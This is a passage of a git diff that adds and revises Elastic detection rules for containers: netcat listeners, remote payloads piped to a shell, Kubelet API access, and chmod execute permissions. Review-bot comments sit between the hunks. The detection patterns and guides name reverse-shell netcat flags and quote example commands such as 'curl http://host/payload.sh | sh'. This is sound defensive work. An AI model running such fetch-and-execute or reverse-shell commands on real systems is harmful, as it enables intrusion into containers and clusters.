"/usr/bin/*", "/usr/local/bin/*", "/entrypoint*" +) and ( + process.name like ("wget", "curl") or + (process.name == "busybox" and process.args == "wget") or + process.executable like ("/tmp/*", "/dev/shm/*", "/var/tmp/*", "/run/*", "/var/run/*", "/mnt/*") +) and container.id like "?*" +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + 
+[rule.threat.tactic]
+name = "Execution"
+id = "TA0002"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[rule.threat.tactic]
+name = "Command and Control"
+id = "TA0011"
+reference = "https://attack.mitre.org/tactics/TA0011/"
+
+[[rule.threat.technique]]
+name = "Application Layer Protocol"
+id = "T1071"
+reference = "https://attack.mitre.org/techniques/T1071/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[rule.threat.tactic]
+name = "Defense Evasion"
+id = "TA0005"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/cloud_defend/execution_interactive_shell_spawned_from_inside_a_container.toml b/rules/integrations/cloud_defend/execution_interactive_shell_spawned_from_inside_a_container.toml
index 01fd7364cb3..6b221375e8f 100644
--- a/rules/integrations/cloud_defend/execution_interactive_shell_spawned_from_inside_a_container.toml
+++ b/rules/integrations/cloud_defend/execution_interactive_shell_spawned_from_inside_a_container.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
+updated_date = "2026/01/15"
 
 [rule]
 author = ["Elastic"]
@@ -98,11 +98,6 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"
 
-[[rule.threat.technique]]
-id = "T1609"
-name = "Container Administration Command"
-reference = "https://attack.mitre.org/techniques/T1609/"
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
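Review bot: The rule name `System Path File Creation and Execution Detected via Defend for Containers` and the guide heading promise detection of execution, but the query only reads `logs-cloud_defend.file*` and matches `event.type == "creation"`; nothing observes the created file being run. Either drop "and Execution" from the name (`System Path File Creation Detected via Defend for Containers`) or turn the rule into a `sequence` that pairs the creation with a later exec, as execution_interactive_file_creation_followed_by_execution.toml does. The Command and Control entry maps curl/wget-style drops to T1071 Application Layer Protocol where T1105 Ingress Tool Transfer is the usual technique for fetching a file into the environment, and the Defense Evasion entry carries no technique at all, so the `/etc` and `/entrypoint` tampering the description mentions is not expressed in the mapping. The tactic-before-technique, `name`-before-`id` layout of the `[[rule.threat]]` tables is also the reverse of the other rule files in this patch.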
diff --git a/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml b/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml
index 34f7b454378..4d369ab6944 100644
--- a/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml
+++ b/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
+updated_date = "2026/02/09"
 
 [rule]
 author = ["Elastic"]
@@ -88,9 +88,14 @@ process.interactive == true and container.id like "?*"
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1609"
-name = "Container Administration Command"
-reference = "https://attack.mitre.org/techniques/T1609/"
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
 
 [rule.threat.tactic]
 id = "TA0002"
diff --git a/rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml b/rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml
new file mode 100644
index 00000000000..8c8ff36688b
--- /dev/null
+++ b/rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml
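Review bot: Replacing T1609 Container Administration Command with T1059/T1059.004 removes the technique that actually describes kubeletctl: it drives the kubelet API to run commands in other containers, which is precisely what T1609 covers, while Unix Shell only applies if the query (outside this hunk) matches a shell being spawned as a result. Keeping T1609 alongside the new T1059.004 entry preserves the more precise mapping at no cost. The parallel T1609 removal in execution_interactive_shell_spawned_from_inside_a_container.toml is easier to defend, since an interactive shell is not in itself an orchestration command.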
@@ -0,0 +1,127 @@ +[metadata] +creation_date = "2023/04/26" +integration = ["cloud_defend"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/01/15" + +[rule] +author = ["Elastic"] +description = """ +This rule detects an established netcat file transfer or listener running inside a container. Netcat is a utility +used for reading and writing data across network connections, and it can be used for malicious purposes such as +establishing a backdoor for persistence, exfiltrating data or file transfer. +""" +false_positives = [ + """ + There is a potential for false positives if the container is used for legitimate tasks that require the use of + netcat, such as network troubleshooting, testing or system monitoring. It is important to investigate any alerts + generated by this rule to determine if they are indicative of malicious activity or part of legitimate container + activity. + """, +] +from = "now-6m" +index = ["logs-cloud_defend.process*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "Netcat File Transfer or Listener Detected via Defend for Containers" +note = """## Setup + +## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating Netcat File Transfer or Listener Detected via Defend for Containers + +Netcat is a versatile networking tool used for reading and writing data across network connections, often employed for legitimate purposes like debugging and network diagnostics. However, adversaries can exploit Netcat to establish unauthorized backdoors or exfiltrate data from containers. 
The detection rule identifies suspicious Netcat activity by monitoring process events within containers, focusing on specific arguments that indicate a listening state, which is a common trait of malicious use. This proactive detection helps mitigate potential threats by flagging unusual network behavior indicative of compromise. + +### Possible investigation steps + +- Review the container ID associated with the alert to identify the specific container where the Netcat listener was established. This can help in understanding the context and potential impact. +- Examine the process name and arguments to confirm the presence of Netcat and its listening state. Look for arguments like "-l", "--listen", "-p", or "--source-port" to verify the listener setup. +- Check the parent process of the Netcat instance to determine how it was initiated. This can provide insights into whether it was started by a legitimate application or a potentially malicious script. +- Investigate the network connections associated with the container to identify any unusual or unauthorized connections that may indicate data exfiltration or communication with a command and control server. +- Analyze the container's recent activity and logs to identify any other suspicious behavior or anomalies that could be related to the Netcat listener, such as unexpected file modifications or other process executions. +- Assess the container's security posture and configuration to determine if there are any vulnerabilities or misconfigurations that could have been exploited to establish the Netcat listener. + +### False positive analysis + +- Development and testing activities within containers may trigger the rule if Netcat is used for legitimate debugging or network diagnostics. Users can create exceptions for specific container IDs or process names associated with known development environments. 
+- Automated scripts or tools that utilize Netcat for routine network checks or health monitoring might be flagged. To mitigate this, users can whitelist these scripts by identifying their unique process arguments or execution patterns. +- Containers running network services that rely on Netcat for legitimate communication purposes could be mistakenly identified. Users should document and exclude these services by specifying their container IDs and associated process arguments. +- Security tools or monitoring solutions that incorporate Netcat for legitimate scanning or testing purposes may cause false positives. Users can manage this by excluding these tools based on their known process names and arguments. + +### Response and remediation + +- Immediately isolate the affected container to prevent further unauthorized access or data exfiltration. This can be done by stopping the container or disconnecting it from the network. +- Conduct a thorough review of the container's logs and process history to identify any unauthorized access or data transfers that may have occurred. +- Remove any unauthorized Netcat binaries or scripts found within the container to eliminate the backdoor. +- Rebuild the container from a known good image to ensure no residual malicious artifacts remain. +- Update container images and underlying host systems with the latest security patches to mitigate vulnerabilities that could be exploited by similar threats. +- Implement network segmentation and firewall rules to restrict unauthorized outbound connections from containers, reducing the risk of data exfiltration. 
+- Escalate the incident to the security operations team for further investigation and to assess the potential impact on other containers or systems within the environment.""" +risk_score = 47 +rule_id = "a52a9439-d52c-401c-be37-2785235c6547" +severity = "medium" +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and ( + process.name in ("nc","ncat","netcat","netcat.openbsd","netcat.traditional") or + ( + /* account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */ + process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and + process.args in ( + "nc", "/bin/nc", "/usr/bin/nc", "/usr/local/bin/nc", + "ncat", "/bin/ncat", "/usr/bin/ncat", "/usr/local/bin/ncat", + "netcat", "/bin/netcat", "/usr/bin/netcat", "/usr/local/bin/netcat", + "netcat.openbsd", "/bin/netcat.openbsd", "/usr/bin/netcat.openbsd", "/usr/local/bin/netcat.openbsd", + "netcat.traditional", "/bin/netcat.traditional", "/usr/bin/netcat.traditional", "/usr/local/bin/netcat.traditional" + ) and + /* default exclusion list to not FP on default multi-process commands */ + not process.args in ( + "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which", + "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man", + "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod", + "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown" + ) + ) +) and +process.args like~ ( + /* bind shell to specific port or listener */ + "-*l*","-*p*", + /* reverse shell to command-line interpreter used for command execution */ + "-*e*", + /* file transfer via stdout/pipe */ + ">","<", "|" +) and process.interactive == 
true and container.id like "*" +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml b/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml new file mode 100644 index 00000000000..929a3fbb945 --- /dev/null +++ b/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml 
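Review bot: The final guard in the query uses `container.id like "*"`, which also matches an empty `container.id` and therefore adds nothing, while every sibling rule in this diff (execution_kubeletctl_execution.toml, execution_potential_direct_kubelet_access_via_process_args.toml, execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml) uses `container.id like "?*"`; suggest `) and process.interactive == true and container.id like "?*"`. The wildcard arguments `"-*p*"` and `"-*e*"` are also much broader than the `-p`/`--source-port` and `-e` forms the triage guide describes (`--help` satisfies `-*p*`, `--version` satisfies `-*e*`), so a narrower pattern or a comment explaining the intended breadth would help triage. Finally, the `note` opens with an empty `## Setup` heading directly followed by `## Triage and analysis`; either fill it in or drop it.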
@@ -0,0 +1,136 @@
+[metadata]
+creation_date = "2026/02/10"
+integration = ["cloud_defend"]
+maturity = "production"
+min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
+min_stack_version = "9.3.0"
+updated_date = "2026/03/05"
+
+[rule]
+author = ["Elastic"]
+description = """
+This rule detects when a payload is downloaded and piped to a shell inside a running container. This
+could indicate a threat actor downloaded a payload and executed it using a shell without the payload
+being stored on the filesystem.
+"""
+from = "now-6m"
+index = ["logs-cloud_defend.process*"]
+interval = "5m"
+language = "eql"
+license = "Elastic License v2"
+name = "Payload Execution via Shell Pipe Detected by Defend for Containers"
+note = """## Triage and analysis
+
+> **Disclaimer**:
+> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
+
+### Investigating Payload Execution via Shell Pipe Detected by Defend for Containers
+
+This rule detects an interactive session in a running Linux container where a downloader process is immediately followed by a shell execution, consistent with fetching code and executing it without writing a file. This matters because piping remote content directly into a shell enables fast, stealthy execution and can bypass filesystem-based controls and forensics. Attackers commonly run patterns like `curl http://host/payload.sh | sh` or `wget -qO- http://host/bootstrap | bash` during initial foothold or lateral movement inside containers.
+
+### Possible investigation steps
+
+- Capture the full interactive command line and session context (TTY/user, working directory, parent chain) to determine whether the shell received stdin from the downloader and what was executed.
+- Identify the remote URL/host contacted and pivot on outbound network telemetry (DNS/HTTP/SNI/IP) to confirm download success, reputation, and whether the endpoint has been used by other workloads.
+- Enumerate follow-on processes spawned by the shell within the next few minutes (e.g., package installs, compilers, crypto-miners, persistence tooling) to assess impact and scope of execution.
+- Check for container breakout or host interaction indicators by reviewing new mounts, access to the Docker/CRI socket, privileged namespace usage, and any writes to host paths from within the container.
+- Preserve volatile artifacts by exporting the container filesystem and collecting in-memory/runtime evidence (environment variables, loaded binaries, cron/systemd/user profiles) before the workload is recycled.
+
+### False positive analysis
+
+- An administrator or developer may use an interactive exec session to troubleshoot or apply a quick remediation by running `curl`/`wget` piped into `sh` (to avoid saving a temporary file), so validate the interactive user/TTY, parent process chain, and whether the contacted URL/host is an expected internal source.
+- During manual container bootstrap or environment setup, an operator may fetch a short initialization or configuration script via `curl`/`wget` and immediately invoke a shell to run it, so confirm it aligns with recent deployment/change activity and that follow-on process, network, and filesystem behavior matches the intended setup.
+
+### Response and remediation
+
+- Immediately isolate the affected container/pod by blocking egress and terminating any active `kubectl exec`/interactive sessions that launched `curl`/`wget` and then a shell to stop further command execution.
+- Preserve evidence before restart by snapshotting the container image/filesystem and collecting running process trees, open network connections, environment variables, and shell history/output associated with the piped execution.
+- Eradicate by deleting and redeploying the workload from a known-good image, rotating any secrets and tokens available to the container, and removing any unauthorized binaries, cron jobs, startup scripts, or modified entrypoints created by the shell session.
+- Escalate to incident response immediately if the downloaded content contacted unknown/external infrastructure, spawned post-exploitation tooling (e.g., miners, scanners, reverse shells), or showed signs of host interaction such as access to the container runtime socket or host-mounted paths.
+- Harden by restricting interactive exec access (RBAC/MFA/just-in-time), enforcing signed/approved images, applying network policies to limit outbound access, and adding runtime controls to block `curl|sh`/`wget|sh` patterns or require allowlisted internal artifact sources."""
+references = [
+ "https://flare.io/learn/resources/blog/teampcp-cloud-native-ransomware",
+]
+risk_score = 47
+rule_id = "a750bbcc-863f-41ef-9924-fd8224e23694"
+severity = "medium"
+tags = [
+ "Data Source: Elastic Defend for Containers",
+ "Domain: Container",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Tactic: Command and Control",
+ "Tactic: Defense Evasion",
+ "Resources: Investigation Guide",
+]
+timestamp_override = "event.ingested"
+type = "eql"
+query = '''
+sequence by process.parent.entity_id, container.id with maxspan=1s
+ [process where event.type == "start" and event.action == "exec" and process.name in ("curl", "wget")]
+ [process where event.action in ("exec", "end") and
+ /*
+ If the flow is executed from a parent script, the event action will be "exec".
+ If the flow is executed manually, the event action will be "end".
+ */
+ process.name like (
+ "bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox",
+ "python*", "perl*", "ruby*", "lua*", "php*"
+ ) and
+ process.args like (
+ "-bash", "-dash", "-sh", "-tcsh", "-csh", "-zsh", "-ksh", "-fish",
+ "bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish",
+ "/bin/bash", "/bin/dash", "/bin/sh", "/bin/tcsh", "/bin/csh",
+ "/bin/zsh", "/bin/ksh", "/bin/fish",
+ "/usr/bin/bash", "/usr/bin/dash", "/usr/bin/sh", "/usr/bin/tcsh",
+ "/usr/bin/csh", "/usr/bin/zsh", "/usr/bin/ksh", "/usr/bin/fish",
+ "-busybox", "busybox", "/bin/busybox", "/usr/bin/busybox",
+ "*python*", "*perl*", "*ruby*", "*lua*", "*php*", "/dev/fd/*"
+ ) and
+ not process.args in (
+ "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which",
+ "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man",
+ "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod",
+ "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown"
+ )]
+'''
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[rule.threat.tactic]
+name = "Execution"
+id = "TA0002"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[rule.threat.tactic]
+name = "Command and Control"
+id = "TA0011"
+reference = "https://attack.mitre.org/tactics/TA0011/"
+
+[[rule.threat.technique]]
+name = "Application Layer Protocol"
+id = "T1071"
+reference = "https://attack.mitre.org/techniques/T1071/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[rule.threat.tactic]
+name = "Defense Evasion"
+id = "TA0005"
+reference = "https://attack.mitre.org/tactics/TA0005/"
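Review bot: The investigation guide states the rule "detects an interactive session", but neither sequence step carries a `process.interactive == true` condition, and unlike the other rules in this diff the query has no `host.os.type == "linux"` filter either; either add `process.interactive == true` to the first step (`[process where event.type == "start" and event.action == "exec" and process.interactive == true and process.name in ("curl", "wget")]`) or reword the guide so triage expectations match what actually fires. The third `[[rule.threat]]` entry maps the Defense Evasion tactic with no technique beneath it, so the `Tactic: Defense Evasion` tag rests on a tactic-only mapping; if that is deliberate a short comment above the entry would stop the next editor "fixing" it, otherwise a technique should be added. The `maxspan=1s` window is tight for a `curl ... | sh` pipeline when the shell's `end` event is what completes the sequence, which may be worth a comment alongside the existing one about `exec` versus `end`.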
diff --git a/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml b/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml new file mode 100644 index 00000000000..1e80e6c6c4e --- /dev/null +++ b/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml 
@@ -0,0 +1,107 @@
+[metadata]
+creation_date = "2026/02/02"
+integration = ["cloud_defend"]
+maturity = "production"
+min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
+min_stack_version = "9.3.0"
+updated_date = "2026/02/09"
+
+[rule]
+author = ["Elastic"]
+description = """
+This rule detects potential direct Kubelet access via process arguments. An adversary may need to access the
+Kubelet API to gain access to the Kubernetes API server or other resources within the cluster. These requests
+are often used to enumerate or execute commands on the Kubernetes API server or other resources within the
+cluster, and may indicate an attempt to move laterally within the cluster.
+"""
+from = "now-6m"
+index = ["logs-cloud_defend.process*"]
+interval = "5m"
+language = "eql"
+license = "Elastic License v2"
+name = "Potential Direct Kubelet Access via Process Arguments Detected via Defend for Containers"
+note = """ ## Triage and analysis
+
+> **Disclaimer**:
+> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
+
+### Investigating Potential Direct Kubelet Access via Process Arguments Detected via Defend for Containers
+
+This detection flags an interactive process started inside a Linux container that includes an HTTP request targeting the Kubelet API on port 10250, a common pivot point for gaining execution and visibility across nodes. Attackers use direct Kubelet access to enumerate pods, fetch logs, or run commands that can lead to broader cluster access and lateral movement. A typical pattern is invoking curl or wget from a container shell against `https://:10250/` endpoints to probe or execute actions.
+
+### Possible investigation steps
+
+- Identify the originating pod/workload and container image for the interactive session, then determine whether the container was expected to provide diagnostic tooling or shell access and whether it recently changed.
+- Extract the full command line and reconstruct the requested Kubelet endpoint path (for example `/pods`, `/exec`, `/run`, `/logs`) to infer intent (enumeration vs remote execution) and capture any embedded tokens or client cert usage.
+- Correlate the process start time with Kubernetes audit logs and API server events to see if there were concurrent pod exec/attach, secret reads, or workload modifications suggesting follow-on activity.
+- Verify whether the destination node IP/hostname is the local node or a remote node and review network flow logs/egress policies to confirm the container could reach port 10250 and whether other nodes were contacted.
+- Check node and Kubelet configuration for exposure and auth bypass risk (anonymous auth, webhook mode, client certs), and inspect Kubelet logs around the timestamp for the corresponding request and response status codes.
+
+### False positive analysis
+
+- A cluster operator or SRE opens an interactive shell in a troubleshooting container and manually curls `https://:10250/` (or `/pods`/`/metrics`) to validate Kubelet reachability, authentication behavior, or node health during incident triage.
+- A legitimate in-container diagnostic workflow uses an interactive session to probe the local node’s Kubelet port 10250 for environment verification (e.g., confirming node IP mapping or TLS/cert configuration), embedding the URL in process arguments without any intent to enumerate or execute actions across the cluster.
+
+### Response and remediation
+
+- Isolate the affected pod by removing service exposure and applying a temporary egress deny rule to block traffic to node port 10250 from that namespace/pod label, then terminate the interactive shell session and restart the workload from a known-good image.
+- Capture and preserve the full command line, container filesystem changes, and relevant Kubelet and Kubernetes audit log entries around the timestamp, then hunt for additional in-cluster attempts to reach `https://:10250/` from other pods or namespaces.
+- Rotate any credentials that may have been exposed or used (service account tokens, client certificates, kubeconfig files) and revoke or redeploy affected service accounts, then validate no unauthorized `exec/attach`, secret reads, or workload changes occurred after the access attempt.
+- Escalate to the platform security/on-call incident commander immediately if the Kubelet request targeted sensitive endpoints like `/exec`, `/run`, `/containerLogs`, or returned successful responses (2xx/3xx) or if similar commands are seen across multiple nodes.
+- Harden by enforcing Kubelet authentication/authorization (disable anonymous access, require webhook authz, restrict client cert issuance), and implement network controls that prevent pods from reaching node Kubelet ports except from approved node-local agents.
+- Reduce recurrence by removing shell and HTTP tooling from application images, limiting interactive access (disable `kubectl exec` for non-admins), and tightening RBAC and admission policies to block privileged pods/host networking that increase node API reachability.
+"""
+references = [
+ "https://heilancoos.github.io/research/2025/12/16/kubernetes.html#kubelet-api",
+ "https://www.cyberark.com/resources/threat-research-blog/using-kubelet-client-to-attack-the-kubernetes-cluster",
+ "https://www.aquasec.com/blog/kubernetes-exposed-exploiting-the-kubelet-api/"
+]
+risk_score = 47
+rule_id = "b4bd186b-69c6-45ad-8bef-5c35bbadeaef"
+severity = "medium"
+tags = [
+ "Data Source: Elastic Defend for Containers",
+ "Domain: Container",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Tactic: Discovery",
+ "Resources: Investigation Guide",
+]
+timestamp_override = "event.ingested"
+type = "eql"
+query = '''
+process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and
+process.args like "http*:10250*" and process.interactive == true and container.id like "?*"
+'''
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1613"
+name = "Container and Resource Discovery"
+reference = "https://attack.mitre.org/techniques/T1613/"
+
+[rule.threat.tactic]
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
diff --git a/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml b/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml
new file mode 100644
index 00000000000..37ebcaa3c19
--- /dev/null
+++ b/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml 
@@ -0,0 +1,124 @@ +[metadata] +creation_date = "2023/04/26" +integration = ["cloud_defend"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/03/05" + +[rule] +author = ["Elastic"] +description = """ +This rule detects when chmod is used to add the execute permission to a file inside a container. Modifying file +permissions to make a file executable could indicate malicious activity, as an attacker may attempt to run unauthorized +or malicious code inside the container. +""" +from = "now-6m" +index = ["logs-cloud_defend.file*", "logs-cloud_defend.process*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "File Execution Permission Modification Detected via Defend for Containers" +note = """## Setup + +## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating File Execution Permission Modification Detected via Defend for Containers + +Containers provide isolated environments for running applications, often on Linux systems. The `chmod` command is used to change file permissions, including making files executable. Adversaries may exploit this by altering permissions to execute unauthorized scripts or binaries, potentially leading to malicious activity. The detection rule identifies such actions by monitoring for `chmod` usage that grants execute permissions, focusing on specific permission patterns, and excluding benign cases. This helps in identifying potential threats where attackers attempt to execute unauthorized code within containers. 
+ +### Possible investigation steps + +- Review the container ID associated with the alert to identify the specific container where the `chmod` command was executed. +- Examine the process arguments to determine the exact permissions that were set and identify the file that was made executable. +- Investigate the origin of the `chmod` command by reviewing the process tree to understand which parent process initiated it and whether it aligns with expected behavior. +- Check the user account or service account that executed the `chmod` command to assess if it has legitimate access and reason to modify file permissions. +- Analyze the file that was made executable to determine its contents and origin, checking for any signs of unauthorized or malicious code. +- Correlate this event with other logs or alerts from the same container to identify any patterns or additional suspicious activities that might indicate a broader attack. + +### False positive analysis + +- Routine maintenance scripts or automated processes may use chmod to set execute permissions on files within containers. To handle these, identify and whitelist specific scripts or processes that are known to be safe and necessary for operations. +- Development environments often involve frequent changes to file permissions as developers test and deploy code. Consider excluding specific container IDs or paths associated with development environments to reduce noise. +- Some container orchestration tools might use chmod as part of their normal operation. Review the processes and arguments associated with these tools and create exceptions for known benign activities. +- System updates or package installations within containers might trigger this rule. Monitor and document regular update schedules and processes, and exclude these from triggering alerts if they are verified as non-threatening. 
+- If certain users or roles are responsible for legitimate permission changes, consider excluding their activities by user ID or role, ensuring that these exclusions are well-documented and reviewed regularly. + +### Response and remediation + +- Immediately isolate the affected container to prevent further execution of unauthorized code. This can be done by stopping the container or disconnecting it from the network. +- Conduct a thorough review of the container's file system to identify any unauthorized or suspicious files that have been made executable. Remove or quarantine these files as necessary. +- Analyze the container's logs to trace the source of the `chmod` command and determine if there are any other indicators of compromise or related malicious activities. +- If the unauthorized execution is confirmed, assess the potential impact on the host system and other containers. Implement additional security measures, such as enhanced monitoring or network segmentation, to protect other assets. +- Escalate the incident to the security operations team for further investigation and to determine if the threat is part of a larger attack campaign. +- Review and update container security policies to prevent unauthorized permission changes, such as implementing stricter access controls and using security tools that enforce policy compliance. 
+- Enhance detection capabilities by configuring alerts for similar suspicious activities, ensuring that any future attempts to modify file permissions within containers are promptly identified and addressed.""" +references = [ + "https://flare.io/learn/resources/blog/teampcp-cloud-native-ransomware", +] +risk_score = 21 +rule_id = "ec604672-bed9-43e1-8871-cf591c052550" +severity = "low" +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +any where event.category in ("file", "process") and event.type in ("change", "creation", "start") and ( + process.name == "chmod" or + ( + /* account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */ + process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and + process.args in ( + "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod" + ) and + /* default exclusion list to not FP on default multi-process commands */ + not process.args in ( + "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which", + "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man" + ) + ) +) and process.args in ("4755", "755", "777", "0777", "444", "+x", "a+x") and +container.id like "?*" and not process.args == "-x" +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1222" +name = "File and Directory Permissions Modification" +reference = 
"https://attack.mitre.org/techniques/T1222/" + +[[rule.threat.technique.subtechnique]] +id = "T1222.002" +name = "Linux and Mac File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/002/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml b/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml index 64fe42e9846..674f355202d 100644 --- a/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml +++ b/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/03/05" [rule] author = ["Elastic"] @@ -54,7 +54,15 @@ references = [ risk_score = 47 rule_id = "cd24c340-b778-44bd-ab69-2f739bd70ce1" severity = "medium" -tags = ["Tactic: Execution", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use 